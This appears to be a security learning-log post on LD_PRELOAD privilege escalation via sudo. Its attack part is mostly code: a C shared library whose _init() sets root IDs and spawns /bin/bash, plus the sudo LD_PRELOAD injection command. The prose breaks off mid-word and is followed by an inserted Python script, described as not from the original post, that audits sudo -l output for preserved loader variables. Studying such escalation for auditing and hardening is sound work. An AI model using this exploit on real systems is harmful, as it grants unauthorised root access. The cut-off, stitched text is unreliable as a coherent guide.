
Day 13: Mastering LD_PRELOAD Privilege Escalation 🛡️
🛠️ The Security Auditor's Toolkit: LD_PRELOAD

The core of this exploit lies in the way Linux handles dynamic linking. When you run a program, the system looks for shared libraries. LD_PRELOAD tells the system: "Load my library first."

1. The Vulnerability

If `sudo -l` shows that you can run a command and the environment variable LD_PRELOAD is not reset or restricted, you can inject your own code into a root process.

2. Crafting the Malicious Library

I practiced writing a simple C wrapper that executes as soon as the library is initialized:

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    setuid(0);          // Set User ID to Root
    setgid(0);          // Set Group ID to Root
    system("/bin/bash"); // Spawn the shell
}
```

3. The Injection

After compiling the library with `gcc -fPIC -shared`, the escalation is just one command away:

```sh
sudo LD_PRELOAD=/tmp/root.so <any_allowed_command>
```

Because the `_init()` function runs before the actual command, the system spawns a root shell imm
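The condition in step 1 is something an auditor can check mechanically. The following script is an added example, not code from the original post: it parses the Defaults block of `sudo -l` output (a constructed sample is embedded) and flags loader-controlling variables that sudoers keeps via `env_keep`, which is the setting that makes the injection above possible and the one to remove.

```python
import re

# Constructed sample of what `sudo -l` prints on a host with the misconfiguration.
SAMPLE_SUDO_L = """Matching Defaults entries for alice on target:
    env_reset, env_keep+=LD_PRELOAD, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/find
"""

# Loader-controlling variables that must not survive sudo's environment reset.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT")


def parse_defaults(sudo_l_output: str) -> list[str]:
    """Return the individual Defaults options listed by `sudo -l`."""
    opts: list[str] = []
    in_defaults = False
    for line in sudo_l_output.splitlines():
        if line.startswith("Matching Defaults entries"):
            in_defaults = True
            continue
        if in_defaults:
            if not line.strip():  # a blank line ends the Defaults block
                break
            opts.extend(o.strip() for o in line.split(",") if o.strip())
    return opts


def audit_sudo_env(sudo_l_output: str) -> dict:
    """Flag env_keep entries that hand the caller control of the dynamic loader."""
    kept: set[str] = set()
    for opt in parse_defaults(sudo_l_output):
        m = re.match(r'env_keep\s*\+?=\s*"?([^"]*)"?$', opt)
        if m:
            kept.update(m.group(1).split())
    findings = []
    for var in LOADER_VARS:
        if var in kept or "LD_*" in kept:
            findings.append(f"{var} is preserved via env_keep; remove it so env_reset drops it")
    return {"env_keep": sorted(kept), "findings": findings}


if __name__ == "__main__":
    for finding in audit_sudo_env(SAMPLE_SUDO_L)["findings"]:
        print("FINDING:", finding)
```

On a real host, pipe the actual `sudo -l` output into `audit_sudo_env`; an empty findings list means sudo's default environment reset is intact for these variables.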




